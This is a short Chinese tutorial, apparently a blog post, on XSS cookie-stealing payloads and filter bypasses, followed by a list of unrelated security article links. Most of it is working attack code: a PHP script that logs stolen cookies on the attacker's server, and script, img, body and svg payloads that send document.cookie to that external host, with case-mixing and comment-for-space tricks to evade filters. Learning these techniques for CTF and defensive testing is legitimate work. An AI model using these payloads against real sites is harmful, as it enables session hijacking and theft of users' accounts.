XSS漏洞--常用payload及绕过

前置准备

  1. 首先准备一个自己的服务器。本地服务器,也就是127.0.0.1不行。
  2. 在服务器的公开的、可访问的目录下准备一个.php文件。我这里命名为flag.php。
  3. flag.php的源代码:
php 复制代码
//flag.php
<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>

代码的作用是保存从目标服务器盗取的Cookie。
前置知识的学习看这里

payload的基本形式

php 复制代码
//js脚本形式
<script>location.href="http://xx.xx.xx.xx/flag.php?cookie="+document.cookie</script>

//img标签。onerror是图片加载失败时触发的事件。
<img src='#' onerror="window.location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//body标签。onload是页面加载完成时触发的事件。
<body onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

//svg标签。
<svg onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>

绕过方法

大小写绕过:

php 复制代码
<ScRipT> <IMg> <BOdy> <SvG>

空格被过滤:

php 复制代码
使用/**/ 或者 / 绕过
<body/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
<body/**/onload="location.href='http://xx.xx.xx.xx/flag.php?cookie='+document.cookie"/>
相关推荐
携欢2 小时前
PortSwigger靶场之盲 SSRF(服务器端请求伪造)漏洞通关秘籍
前端·网络·安全·web安全
Cyyyy_g5 小时前
【2025 SWPU-NSSCTF 秋季训练赛】WebFTP
安全·网络安全
平凡的学者6 小时前
RustyKey
网络安全·hackthebox
unable code7 小时前
攻防世界-Misc-pdf
网络安全·ctf·misc·1024程序员节
网安小白的进阶之路8 小时前
A模块 系统与网络安全 第四门课 弹性交换网络-4
网络·web安全·php
落一落,掉一掉8 小时前
第十五周Fscan和利用漏洞上线远程和数据库提权上线远控
安全·web安全
九河云14 小时前
数字化转型中的网络安全风险与零信任架构实践
运维·科技·安全·web安全·架构
是Yu欸20 小时前
【博资考5】网安2025
网络·人工智能·经验分享·笔记·网络安全·ai·博资考
jenchoi41320 小时前
【2025-11-02】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
安全·web安全·网络安全
上海云盾-高防顾问20 小时前
什么是端口管理?网络安全的关键环节
安全·web安全